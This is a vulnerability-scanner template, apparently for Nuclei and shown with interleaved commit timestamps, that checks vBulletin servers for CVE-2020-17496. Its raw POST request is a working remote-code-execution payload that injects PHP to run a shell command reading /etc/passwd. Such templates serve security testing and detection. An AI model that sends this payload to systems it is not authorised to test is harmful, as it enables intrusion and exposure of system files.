2021-02-24 20:00:52 +00:00
id : CVE-2020-17496
2022-04-07 13:53:15 +00:00
2021-02-24 20:00:52 +00:00
info :
2022-04-29 19:58:07 +00:00
name : vBulletin 5.5.4 - 5.6.2- Remote Command Execution
2021-02-25 09:04:22 +00:00
author : pussycat0x
severity : critical
2022-05-17 09:18:12 +00:00
description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE : this issue exists because of an incomplete fix for CVE-2019-16759.'
2022-04-07 13:53:15 +00:00
reference :
- https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
- https://nvd.nist.gov/vuln/detail/CVE-2020-17496
2022-05-17 09:18:12 +00:00
- https://seclists.org/fulldisclosure/2020/Aug/5
- https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-17496
cwe-id : CWE-74
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
epss-score : 0.97519
2022-08-27 04:41:18 +00:00
tags : vbulletin,rce,kev,tenable,seclists,cve,cve2020
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-02-25 09:04:22 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-25 09:31:40 +00:00
- raw :
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
2021-09-30 16:52:05 +00:00
Host : {{Hostname}}
2021-02-25 09:31:40 +00:00
Content-Type : application/x-www-form-urlencoded
2021-02-25 09:04:22 +00:00
2021-02-25 09:31:40 +00:00
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
2021-02-25 09:04:22 +00:00
2021-02-25 06:55:34 +00:00
matchers-condition : and
matchers :
2021-02-25 09:13:06 +00:00
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-02-25 09:13:06 +00:00
- type : status
status :
2021-09-30 16:52:05 +00:00
- 200